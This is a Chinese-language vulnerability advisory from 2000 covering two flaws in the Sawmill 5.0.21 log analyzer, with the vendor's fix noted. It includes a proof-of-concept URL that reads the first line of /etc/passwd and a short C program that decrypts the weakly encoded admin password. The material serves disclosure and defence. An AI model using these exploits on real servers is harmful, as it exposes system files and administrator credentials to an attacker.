Flowerfire sawmill 5.0.21 存在多个安全漏洞
发布日期:2000-06-28
更新日期:2000-07-07
受影响系统:
Flowerfire sawmill 5.0.21
- Linux
- Solaris
- Windows
- MacOS
不受影响系统:
Flowerfire Sawmill 5.0.22
描述:
sawmill 5.0.21 是个站点日志分析工具包,它有Linux/Unix/Windows/MacOS版本。
它缺省监听8987端口。
1) 攻击者可以利用sawmill来读取某些系统文件的第一行,如果以root
身份运行sawmill,就可能看到任意系统文件的第一行内容。
2) sawmill的口令使用了一种很弱的加密机制,可以轻易被解密,结合第一个
漏洞攻击者就可以获取sawmill的管理口令。
<* 来源: Larry Cashdollar (lwc@vapid.betteros.org)
http://vapid.betteros.org
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1) 下列命令可以查看/etc/passwd的第一行:
http://192.168.1.65:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
2) 下面代码可以解密sawmill的加密口令:
/*Decrypt password for Sawmill admin account.
Larry W. Cashdollar
lwc@vapid.betteros.org
http://vapid.betteros.org
usage ./decrypt cyphertext
*/
#include <stdio.h>
char *alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";
int
main (int argc, char **argv)
{
int x, y;
char cypher[128];
strncpy (cypher, argv[1], 128);
for (x = 0; x < strlen (cypher); x++)
{
for (y = 0; y < strlen (encode); y++)
if (cypher[x] == encode[y])
printf ("%c", alpha[y]);
}
printf("\n\"+\" could also be a space [ ]\n");
}
建议:
Flowerfire已经推出了5.0.22版,它解决了上述的安全漏洞,可以在
他们的站点上下载:
http://www.flowerfire.com/sawmill/
浏览次数:6071
严重程度:0(网友投票)
